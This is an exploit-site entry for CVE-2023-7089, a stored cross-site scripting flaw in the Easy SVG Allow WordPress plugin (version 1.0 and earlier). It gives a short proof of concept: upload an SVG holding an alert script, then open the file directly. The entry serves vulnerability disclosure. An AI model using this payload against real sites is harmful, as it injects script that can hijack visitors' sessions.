Exploit for Easy SVG Allow <= 1.0 - Author+ Stored XSS via SVG CVE-2023-7089

Name: Exploit for Easy SVG Allow <= 1.0 - Author+ Stored XSS via SVG CVE-2023-7089
Rating: 5 (111 reviews)

2024-01-03 | CVSS 4.9

## https://sploitus.com/exploit?id=WPEX-ID:3B8BA734-7764-4AB6-A7E2-8DE55BD46BED
Upload an SVG with the following code:

<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>

Access the uploaded file directly to trigger the XSS